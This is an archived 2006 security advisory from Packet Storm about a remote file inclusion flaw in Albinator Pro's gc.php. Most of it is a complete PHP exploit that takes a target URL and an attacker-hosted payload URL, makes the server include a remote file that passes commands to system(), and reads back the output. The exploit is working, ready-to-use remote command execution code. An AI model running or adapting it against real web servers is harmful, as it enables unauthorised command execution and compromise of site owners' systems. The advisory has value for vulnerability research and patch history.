AlbinatorPro208.txt

2006-05-06T00:00:00
ID PACKETSTORM:46105
Type packetstorm
Reporter xorcrew.net
Modified 2006-05-06T00:00:00

Description

                                        
                                            `===========================================================================  
XOR Crew :: Security Advisory 0day GIVE AWAY (date?) 2/20/2006  
===========================================================================  
Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability  
===========================================================================  
http://www.xorcrew.net/ http://www.xorcrew.net/ReZEN  
===========================================================================  
  
:: Summary  
  
Vendor : Albinator  
Vendor Site : http://www.dreamcost.com/  
Product(s) : Albinator Pro - Photo Album/Gallery Management System  
Version(s) : All  
Severity : Medium/High  
Impact : Remote Command Execution  
Release Date : 2/11/2006  
Credits : ReZEN (rezen (a) xorcrew (.) net)  
  
===========================================================================  
  
I. Description  
  
Albinator is developed in PHP, backed by lightning speed database in   
MySql. With its unique features, it instantly and automatically   
organizes your websites' users digital images into compact digital photo   
albums ideal for sharing and emailing to friends and family. It   
automatically generates thumbnails to the photos for easy browsing.  
  
  
===========================================================================  
  
II. Synopsis (0day give away because r0t is stupid)  
  
THIS BUG WORKS FOR ALL VERSIONS OF ALBINATOR!!!  
  
(r0t you are a moron, stick to useless XSS exploits please thanks)  
  
There is a remote file inclusion vulnerability that allows for remote   
command execution in the /essentials/gc.php and in the   
essentials/integration.inc.php file. The bug is here on lines 2, and 3:  
  
include_once($dirpath . "essential/config.php");  
include_once($dirpath . "essential/config_tables.inc.php");  
  
the $dirpath variable is not set prior to being used in the   
include_once() function. The vendor and support team have been contacted.  
  
===========================================================================  
  
Exploit code:  
  
-----BEGIN-----  
  
<?php  
/*  
Albinator Remote File Inclusion Exploit c0ded by ReZEN  
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K  
url: http://www.xorcrew.net/ReZEN  
  
example:  
turl: http://www.target.com/path to albinator/essential/gc.php?dirpath=  
hurl: http://www.pwn3d.com/evil.txt?  
  
*/  
  
$cmd = $_POST["cmd"];  
$turl = $_POST["turl"];  
$hurl = $_POST["hurl"];  
  
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"  
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"   
value=\"".$turl."\"><br>"  
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"   
value=\"".$hurl."\"><br>"  
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"   
value=\"".$cmd."\"><br>"  
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"  
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";  
  
if (!isset($_POST['submit']))  
{  
  
echo $form;  
  
}else{  
  
$file = fopen ("test.txt", "w+");  
  
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");  
system(\"echo ++END++\"); ?>");  
fclose($file);  
  
$file = fopen ($turl.$hurl, "r");  
if (!$file) {  
echo "<p>Unable to get output.\n";  
exit;  
}  
  
echo $form;  
  
while (!feof ($file)) {  
$line .= fgets ($file, 1024)."<br>";  
}  
$tpos1 = strpos($line, "++BEGIN++");  
$tpos2 = strpos($line, "++END++");  
$tpos1 = $tpos1+strlen("++BEGIN++");  
$tpos2 = $tpos2-$tpos1;  
$output = substr($line, $tpos1, $tpos2);  
echo $output;  
  
}  
?>  
  
  
------END------  
  
===========================================================================  
  
IV. Greets :>  
  
All of xor, Infinity, stokhli, ajax, gml, cijfer, D2K.  
  
===========================================================================  
  
`